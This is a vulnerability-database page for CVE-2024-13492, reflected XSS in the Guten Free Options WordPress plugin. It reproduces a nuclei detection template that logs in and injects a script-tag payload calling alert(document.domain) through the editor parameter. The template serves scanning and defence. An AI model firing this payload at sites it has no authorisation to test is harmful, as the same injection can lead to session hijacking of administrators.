Lucene search
K

Guten Free Options - Cross Site Scripting

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

Guten Free Options WordPress plugin up to 0.9.5 has reflected cross site scripting from unsanitized output.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13492
7 Feb 202506:12
circl
CNNVD
WordPress plugin Guten Free Options 安全漏洞
7 Feb 202500:00
cnnvd
CVE
CVE-2024-13492
7 Feb 202506:00
cve
Cvelist
CVE-2024-13492 Guten Free Options <= 0.9.5 - Reflected XSS
7 Feb 202506:00
cvelist
EUVD
EUVD-2024-51629
3 Oct 202520:07
euvd
NVD
CVE-2024-13492
7 Feb 202506:15
nvd
OSV
CVE-2024-13492
7 Feb 202506:15
osv
Patchstack
WordPress Guten Free Options plugin <= 0.9.5 - Reflected XSS vulnerability
31 Dec 202500:00
patchstack
Positive Technologies
PT-2025-5903
7 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13492
9 Feb 202506:24
redhatcve
Rows per page
id: CVE-2024-13492

info:
  name: Guten Free Options - Cross Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Guten Free Options WordPress plugin <= 0.9.5 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to click malicious link.
  impact: |
    Attackers can execute malicious scripts in high privilege users' browsers, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/a4a75b75-4801-4ed4-bcc6-4874ac169562/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13492
    cwe-id: CWE-79
    epss-score: 0.00568
    epss-percentile: 0.43024
    cpe: cpe:2.3:a:wordquest:guten_free_options:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordquest
    product: guten_free_options
  tags: cve,cve2024,wordquest,guten-free-options,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=page&editor=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 490a00463044022033d42fc5535ffc37cb30aa82b57bc9ad9380d81a4204f53fae75fa2298adf447022053302968a29e5b3288e0c8c0b2096be1f2beeaa82d77f163e879eeeab68b7d80:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation